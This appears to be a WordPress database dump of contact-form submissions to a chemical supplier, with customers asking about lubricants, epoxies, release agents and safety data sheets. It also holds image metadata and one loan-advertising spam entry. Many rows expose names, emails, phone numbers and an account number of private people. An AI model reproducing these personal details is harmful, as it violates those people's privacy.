INSERT INTO `wp_postmeta` VALUES (40008, 4655, '_field_2', 'tburghall@smpchev.ca'); 
INSERT INTO `wp_postmeta` VALUES (40009, 4655, '_field_8', '(306) 652-8685'); 
INSERT INTO `wp_postmeta` VALUES (40010, 4655, '_field_3', 'Where in Canada can I purchase GPL215 Krytox Grease ??'); 
INSERT INTO `wp_postmeta` VALUES (40011, 4655, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40012, 4655, '_sub_id', '4655'); 
INSERT INTO `wp_postmeta` VALUES (40013, 4656, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40014, 4656, '_seq_num', '775'); 
INSERT INTO `wp_postmeta` VALUES (40015, 4656, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40016, 4656, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40017, 4656, '_field_1', 'Glenn Burling'); 
INSERT INTO `wp_postmeta` VALUES (40018, 4656, '_field_10', 'Home'); 
INSERT INTO `wp_postmeta` VALUES (40019, 4656, '_field_2', 'glennburlingltd@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (40020, 4656, '_field_8', '(562) 332-0020'); 
INSERT INTO `wp_postmeta` VALUES (40021, 4656, '_field_3', 'I will like to order Release Agents\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40022, 4656, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40023, 4656, '_sub_id', '4656'); 
INSERT INTO `wp_postmeta` VALUES (40024, 4657, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40025, 4657, '_seq_num', '776'); 
INSERT INTO `wp_postmeta` VALUES (40026, 4657, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40027, 4657, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40028, 4657, '_field_1', 'Glenn Burling'); 
INSERT INTO `wp_postmeta` VALUES (40029, 4657, '_field_10', 'Home'); 
INSERT INTO `wp_postmeta` VALUES (40030, 4657, '_field_2', 'glennburlingltd@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (40031, 4657, '_field_8', '5623300020'); 
INSERT INTO `wp_postmeta` VALUES (40032, 4657, '_field_3', 'I will like to order Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (40033, 4657, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40034, 4657, '_sub_id', '4657'); 
INSERT INTO `wp_postmeta` VALUES (40035, 4658, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40036, 4658, '_seq_num', '777'); 
INSERT INTO `wp_postmeta` VALUES (40037, 4658, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40038, 4658, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40039, 4658, '_field_1', 'igal golan'); 
INSERT INTO `wp_postmeta` VALUES (40040, 4658, '_field_10', 'private'); 
INSERT INTO `wp_postmeta` VALUES (40041, 4658, '_field_2', 'golanigal@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (40042, 4658, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40043, 4658, '_field_3', 'i need one kit of epoxy 907 adhesive system\r\ncan you help me when i can find this in israel, or if not can you send me one kit. \r\nmy phone no, 972-528905382'); 
INSERT INTO `wp_postmeta` VALUES (40044, 4658, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40045, 4658, '_sub_id', '4658'); 
INSERT INTO `wp_postmeta` VALUES (40046, 4659, '_wp_attached_file', '2016/09/shutterstock_522668815.jpg'); 
INSERT INTO `wp_postmeta` VALUES (40047, 4659, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/09/shutterstock_522668815.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_522668815-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_522668815-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_522668815-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_522668815-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_522668815-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_522668815-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_522668815-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (40048, 1668, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (40049, 1668, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (40050, 1668, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (40051, 1668, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (40052, 1668, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (40053, 4660, '_wp_attached_file', '2016/09/shutterstock_511113739.jpg'); 
INSERT INTO `wp_postmeta` VALUES (40054, 4660, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/09/shutterstock_511113739.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_511113739-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_511113739-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_511113739-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_511113739-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_511113739-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_511113739-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_511113739-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (40055, 1670, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (40056, 1670, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (40057, 1670, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (40058, 1670, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (40059, 1670, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (40060, 4661, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40061, 4661, '_seq_num', '327'); 
INSERT INTO `wp_postmeta` VALUES (40062, 4661, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40063, 4661, '_field_12', 'Jim Parker'); 
INSERT INTO `wp_postmeta` VALUES (40064, 4661, '_field_13', 'Sterling Reference Materials'); 
INSERT INTO `wp_postmeta` VALUES (40065, 4661, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40066, 4661, '_field_14', 'jparker@SterlingReferenceMaterials.com'); 
INSERT INTO `wp_postmeta` VALUES (40067, 4661, '_field_15', '(303) 419-9752'); 
INSERT INTO `wp_postmeta` VALUES (40068, 4661, '_field_16', 'Good Afternoon!\n\nI am looking for an epoxy that I can use in my reference material business.  I need an epoxy that will cure very hard - enough that I can slice with a saw and then grind flat with an abrasive grinder.  I need to be able to add approximately 2% filler to the epoxy and will need enough time to mix the filler and epoxy to a homogeneous mixture.  The filler should not separate during curing.  Any suggestions as to what epoxy resins might best meet my needs?  Thanks, Jim 303-419-9752'); 
INSERT INTO `wp_postmeta` VALUES (40069, 4661, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40070, 4661, '_sub_id', '4661'); 
INSERT INTO `wp_postmeta` VALUES (40071, 4662, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40072, 4662, '_seq_num', '328'); 
INSERT INTO `wp_postmeta` VALUES (40073, 4662, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40074, 4662, '_field_12', 'raul valdez'); 
INSERT INTO `wp_postmeta` VALUES (40075, 4662, '_field_13', 'spellman mexico'); 
INSERT INTO `wp_postmeta` VALUES (40076, 4662, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40077, 4662, '_field_14', 'raulv@spellmanhv.com'); 
INSERT INTO `wp_postmeta` VALUES (40078, 4662, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (40079, 4662, '_field_16', 'Hi, good day miller-Stephenson.\nI was check data sheet, but I not find the following.\nI have an one question over MS-122AD.\n\nWhich is the lifetime of agent after 10 min of application on metal?.\n\nThanks and I hope your help.\nRegards\nRaul Valdez.'); 
INSERT INTO `wp_postmeta` VALUES (40080, 4662, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40081, 4662, '_sub_id', '4662'); 
INSERT INTO `wp_postmeta` VALUES (40082, 4663, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40083, 4663, '_seq_num', '778'); 
INSERT INTO `wp_postmeta` VALUES (40084, 4663, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40085, 4663, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40086, 4663, '_field_1', 'Americo Medina'); 
INSERT INTO `wp_postmeta` VALUES (40087, 4663, '_field_10', 'Lifestyle footwear'); 
INSERT INTO `wp_postmeta` VALUES (40088, 4663, '_field_2', 'americo.medina@rockybrands.com'); 
INSERT INTO `wp_postmeta` VALUES (40089, 4663, '_field_8', '(787) 877-5306'); 
INSERT INTO `wp_postmeta` VALUES (40090, 4663, '_field_3', 'Hi we make PU mid sole is a poly blend LF 56757\nfrom Huntsman, do you have a mold release that may work for us?'); 
INSERT INTO `wp_postmeta` VALUES (40091, 4663, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40092, 4663, '_sub_id', '4663'); 
INSERT INTO `wp_postmeta` VALUES (40093, 4664, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40094, 4664, '_seq_num', '779'); 
INSERT INTO `wp_postmeta` VALUES (40095, 4664, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40096, 4664, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40097, 4664, '_field_1', 'Ashraf  OSMAN'); 
INSERT INTO `wp_postmeta` VALUES (40098, 4664, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (40099, 4664, '_field_2', 'ashraf.osman@mtc.edu.eg'); 
INSERT INTO `wp_postmeta` VALUES (40100, 4664, '_field_8', '(514) 662-4157'); 
INSERT INTO `wp_postmeta` VALUES (40101, 4664, '_field_3', 'Please, we need to know the price for purchasing about 50 gallons of Shell Epon epoxy 863 and Epikure Curing Agent 3233. The resin is needed for graduate research purposes.'); 
INSERT INTO `wp_postmeta` VALUES (40102, 4664, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40103, 4664, '_sub_id', '4664'); 
INSERT INTO `wp_postmeta` VALUES (40104, 4665, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40105, 4665, '_seq_num', '329'); 
INSERT INTO `wp_postmeta` VALUES (40106, 4665, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40107, 4665, '_field_12', 'Matt Perun'); 
INSERT INTO `wp_postmeta` VALUES (40108, 4665, '_field_13', 'Philips'); 
INSERT INTO `wp_postmeta` VALUES (40109, 4665, '_field_18', 'Na'); 
INSERT INTO `wp_postmeta` VALUES (40110, 4665, '_field_14', 'matthew.perun@philips.com'); 
INSERT INTO `wp_postmeta` VALUES (40111, 4665, '_field_15', '(760) 918-7468'); 
INSERT INTO `wp_postmeta` VALUES (40112, 4665, '_field_16', 'Can I get a MSDS sheet for Krytox 226 please.  Thanks,  Matt'); 
INSERT INTO `wp_postmeta` VALUES (40113, 4665, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40114, 4665, '_sub_id', '4665'); 
INSERT INTO `wp_postmeta` VALUES (40115, 4666, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40116, 4666, '_seq_num', '780'); 
INSERT INTO `wp_postmeta` VALUES (40117, 4666, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40118, 4666, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40119, 4666, '_field_1', 'FastFundingAdvisors'); 
INSERT INTO `wp_postmeta` VALUES (40120, 4666, '_field_10', 'http://FastFundingAdvisors.com'); 
INSERT INTO `wp_postmeta` VALUES (40121, 4666, '_field_2', 'fundingteam+miller-stephenson.com@fastfundingadvisors.com'); 
INSERT INTO `wp_postmeta` VALUES (40122, 4666, '_field_8', '468-454-4623'); 
INSERT INTO `wp_postmeta` VALUES (40123, 4666, '_field_3', 'Quicker and Simpler than the SBA, http://FastFundingAdvisors.com can get your business a loan for $2K-350,000 With low-credit and no collateral. \r\n \r\nUse our short form to Find Out exactly how much you can get, No-Cost: \r\n \r\nhttp://FastFundingAdvisors.com/i.php?url=miller-stephenson.com&amp;id=e75 \r\n \r\nIf you&#039;ve been established for at least 12 months you are already pre-qualified. Our Quick service means funding can be finished within 48 hours. Terms are personalized for each business so I suggest applying to find out exactly how much you can get. \r\n \r\nThis is a free service from a qualified lender and the approval will be based on the annual revenue of your business. Funds have no Restrictions, allowing you to use the whole amount in any way including bills, taxes, hiring, marketing, expansion, or Absolutely Any Other expense. \r\n \r\nThere are limited SBA and private funds available so please apply now if interested, \r\n \r\nClick Here: http://FastFundingAdvisors.com/i.php?id=e75 \r\n \r\nHave a great day, \r\nThe Fast Funding Advisors Team \r\n \r\nremove here - http://fastfundingadvisors.com/r.php?url=miller-stephenson.com&amp;id=e75'); 
INSERT INTO `wp_postmeta` VALUES (40124, 4666, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40125, 4666, '_sub_id', '4666'); 
INSERT INTO `wp_postmeta` VALUES (40126, 4667, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40127, 4667, '_seq_num', '330'); 
INSERT INTO `wp_postmeta` VALUES (40128, 4667, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40129, 4667, '_field_12', 'igal  golan'); 
INSERT INTO `wp_postmeta` VALUES (40130, 4667, '_field_13', 'privet'); 
INSERT INTO `wp_postmeta` VALUES (40131, 4667, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40132, 4667, '_field_14', 'golanigal@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (40133, 4667, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (40134, 4667, '_field_16', 'please, send me detailes of  your agency in SHOAM city in ISRAEL\r\nthank you\r\nIgal Golan'); 
INSERT INTO `wp_postmeta` VALUES (40135, 4667, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40136, 4667, '_sub_id', '4667'); 
INSERT INTO `wp_postmeta` VALUES (40137, 4668, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40138, 4668, '_seq_num', '331'); 
INSERT INTO `wp_postmeta` VALUES (40139, 4668, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40140, 4668, '_field_12', 'Gerry crosse'); 
INSERT INTO `wp_postmeta` VALUES (40141, 4668, '_field_13', 'Woodco - energy'); 
INSERT INTO `wp_postmeta` VALUES (40142, 4668, '_field_18', 'No '); 
INSERT INTO `wp_postmeta` VALUES (40143, 4668, '_field_14', 'Gerry@renewables.ir'); 
INSERT INTO `wp_postmeta` VALUES (40144, 4668, '_field_15', '(353) 627-4007'); 
INSERT INTO `wp_postmeta` VALUES (40145, 4668, '_field_16', 'I am from Ireland\r\nI want to speak to somebody in technical dept \r\nTo discuss suitability of your oil when mixed with a solvent (3M 7100) \r\nThe pressure in the system will be max 100psi. Max temp 300*F\r\nRegards\r\nGerry Crosse\r\nR&amp;D dept\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40146, 4668, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40147, 4668, '_sub_id', '4668'); 
INSERT INTO `wp_postmeta` VALUES (40148, 4669, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40149, 4669, '_seq_num', '781'); 
INSERT INTO `wp_postmeta` VALUES (40150, 4669, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40151, 4669, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40152, 4669, '_field_1', 'Mikhail Tsurkan'); 
INSERT INTO `wp_postmeta` VALUES (40153, 4669, '_field_10', 'Leibniz Institute of Polymer Research Dresden'); 
INSERT INTO `wp_postmeta` VALUES (40154, 4669, '_field_2', 'tsurkan@ipfdd.de'); 
INSERT INTO `wp_postmeta` VALUES (40155, 4669, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40156, 4669, '_field_3', 'I am looking for rytox 157 FSH, which I require for a synthesis. Could you please send me a quote for this lubricant with delivery to Germany? \r\n\r\nMany  thanks,\r\nMikhail\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40157, 4669, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40158, 4669, '_sub_id', '4669'); 
INSERT INTO `wp_postmeta` VALUES (40159, 4670, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40160, 4670, '_seq_num', '782'); 
INSERT INTO `wp_postmeta` VALUES (40161, 4670, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40162, 4670, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40163, 4670, '_field_1', 'Carson Tobias'); 
INSERT INTO `wp_postmeta` VALUES (40164, 4670, '_field_10', 'Rose Medical'); 
INSERT INTO `wp_postmeta` VALUES (40165, 4670, '_field_2', 'ctobias@rosemedical.com'); 
INSERT INTO `wp_postmeta` VALUES (40166, 4670, '_field_8', '(616) 233-3000'); 
INSERT INTO `wp_postmeta` VALUES (40167, 4670, '_field_3', 'Do you have the latest SDS for MS-222N?'); 
INSERT INTO `wp_postmeta` VALUES (40168, 4670, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40169, 4670, '_sub_id', '4670'); 
INSERT INTO `wp_postmeta` VALUES (40170, 4671, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40171, 4671, '_seq_num', '332'); 
INSERT INTO `wp_postmeta` VALUES (40172, 4671, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40173, 4671, '_field_12', 'Ross Ferrin'); 
INSERT INTO `wp_postmeta` VALUES (40174, 4671, '_field_13', 'Zero Manufacturing'); 
INSERT INTO `wp_postmeta` VALUES (40175, 4671, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40176, 4671, '_field_14', 'ross.ferrin@zerocases.com'); 
INSERT INTO `wp_postmeta` VALUES (40177, 4671, '_field_15', '(801) 397-8614'); 
INSERT INTO `wp_postmeta` VALUES (40178, 4671, '_field_16', 'I am looking for a Kytox grease that is clean room compatible for use in caster bearings.  Can you provide a recommended product?  I was given the name of the Kytox brand as a material of choice from Harris Aerospace, but not a specific product in the Kytox family.\nThank you, Ross'); 
INSERT INTO `wp_postmeta` VALUES (40179, 4671, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40180, 4671, '_sub_id', '4671'); 
INSERT INTO `wp_postmeta` VALUES (40181, 4672, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40182, 4672, '_seq_num', '333'); 
INSERT INTO `wp_postmeta` VALUES (40183, 4672, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40184, 4672, '_field_12', 'Ilsa Juhlin'); 
INSERT INTO `wp_postmeta` VALUES (40185, 4672, '_field_13', 'Vicis, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (40186, 4672, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40187, 4672, '_field_14', 'ijuhlin@uw.edu'); 
INSERT INTO `wp_postmeta` VALUES (40188, 4672, '_field_15', '(425) 770-8972'); 
INSERT INTO `wp_postmeta` VALUES (40189, 4672, '_field_16', 'I am currently molding polyurethane with a silicone based release agent and we are having issues with air contamination from the silicone. Ideally I would like a non-silicone based release agent for complex structures (deep corners on the mold) that is also compatible for the cast to then be glued to another material. Your expertise would be greatly appreciated.\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40190, 4672, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40191, 4672, '_sub_id', '4672'); 
INSERT INTO `wp_postmeta` VALUES (40192, 4673, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40193, 4673, '_seq_num', '334'); 
INSERT INTO `wp_postmeta` VALUES (40194, 4673, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40195, 4673, '_field_12', 'Matt'); 
INSERT INTO `wp_postmeta` VALUES (40196, 4673, '_field_13', 'Central Aircraft Maintenance'); 
INSERT INTO `wp_postmeta` VALUES (40197, 4673, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40198, 4673, '_field_14', 'matt@kreosaviation.com'); 
INSERT INTO `wp_postmeta` VALUES (40199, 4673, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (40200, 4673, '_field_16', 'Hello,\r\nCan you please inform me of which current item would be a direct replacement for MS-122DF?'); 
INSERT INTO `wp_postmeta` VALUES (40201, 4673, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40202, 4673, '_sub_id', '4673'); 
INSERT INTO `wp_postmeta` VALUES (40203, 4674, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40204, 4674, '_seq_num', '783'); 
INSERT INTO `wp_postmeta` VALUES (40205, 4674, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40206, 4674, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40207, 4674, '_field_1', 'Shawn Tein'); 
INSERT INTO `wp_postmeta` VALUES (40208, 4674, '_field_10', 'CEI Limited'); 
INSERT INTO `wp_postmeta` VALUES (40209, 4674, '_field_2', 'teincm@cei.com.sg'); 
INSERT INTO `wp_postmeta` VALUES (40210, 4674, '_field_8', '(656) 481-1882'); 
INSERT INTO `wp_postmeta` VALUES (40211, 4674, '_field_3', 'Dear Sir/ Madam,\n\nI’m Shawn Tein from CEI Limited Procurement dept.\nCan you help check &amp; submit Miller Stephenson Epoxy 907 price by today?\n\nMFG: MILLER STEPHENSON\nMFG#: EPOXY 907\nDESC: EPOXY 907 3.7 OZ (MILLER-STEPHENSON)\n\nQty To Quote: \n1) 50 Grams\n2) 100 Grams\n3) 300 Grams\n4) 600 Grams\n5) 900 Grams\n6) 1200 Grams\n\nTop Urgent! Pls. help expedite!\nThanks in advance!\n \n \nThanks &amp; Regards\nShawn Tein'); 
INSERT INTO `wp_postmeta` VALUES (40212, 4674, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40213, 4674, '_sub_id', '4674'); 
INSERT INTO `wp_postmeta` VALUES (40214, 4675, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40215, 4675, '_seq_num', '784'); 
INSERT INTO `wp_postmeta` VALUES (40216, 4675, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40217, 4675, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40218, 4675, '_field_1', 'Dianne Dunks'); 
INSERT INTO `wp_postmeta` VALUES (40219, 4675, '_field_10', 'University of Wisconsin Hospital and Clinics'); 
INSERT INTO `wp_postmeta` VALUES (40220, 4675, '_field_2', 'ddunks@uwhealth.org'); 
INSERT INTO `wp_postmeta` VALUES (40221, 4675, '_field_8', '(608) 263-3140'); 
INSERT INTO `wp_postmeta` VALUES (40222, 4675, '_field_3', 'Can you please send me a current statement for account 3303315?  Thanks'); 
INSERT INTO `wp_postmeta` VALUES (40223, 4675, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40224, 4675, '_sub_id', '4675'); 
INSERT INTO `wp_postmeta` VALUES (40225, 4676, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40226, 4676, '_seq_num', '785'); 
INSERT INTO `wp_postmeta` VALUES (40227, 4676, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40228, 4676, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40229, 4676, '_field_1', 'Annalisa Acquesta'); 
INSERT INTO `wp_postmeta` VALUES (40230, 4676, '_field_10', 'University of Naples'); 
INSERT INTO `wp_postmeta` VALUES (40231, 4676, '_field_2', 'annalisa.acquesta@unina.it'); 
INSERT INTO `wp_postmeta` VALUES (40232, 4676, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40233, 4676, '_field_3', 'Can I have a  quotation for 5kg of the products EPON Resin 828 and EPIKURE 3245? Thank you'); 
INSERT INTO `wp_postmeta` VALUES (40234, 4676, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40235, 4676, '_sub_id', '4676'); 
INSERT INTO `wp_postmeta` VALUES (40236, 4677, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40237, 4677, '_seq_num', '786'); 
INSERT INTO `wp_postmeta` VALUES (40238, 4677, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40239, 4677, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40240, 4677, '_field_1', 'Halim Chtourou'); 
INSERT INTO `wp_postmeta` VALUES (40241, 4677, '_field_10', 'FPInnovations'); 
INSERT INTO `wp_postmeta` VALUES (40242, 4677, '_field_2', 'halim.chtourou@fpinnovations.ca'); 
INSERT INTO `wp_postmeta` VALUES (40243, 4677, '_field_8', '(514) 782-4657'); 
INSERT INTO `wp_postmeta` VALUES (40244, 4677, '_field_3', 'Hi Sir/Mme,\nWe have a new project, R&amp;D and concept validation phase, where we would like to use the epoxy system Epon 828/Epikure W. The total needed quantity is less than 40 kg.\n\nWould you please get back to us with your best offer ?\n\nThanks,\n\nHalim'); 
INSERT INTO `wp_postmeta` VALUES (40245, 4677, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40246, 4677, '_sub_id', '4677'); 
INSERT INTO `wp_postmeta` VALUES (40247, 4678, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40248, 4678, '_seq_num', '787'); 
INSERT INTO `wp_postmeta` VALUES (40249, 4678, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40250, 4678, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
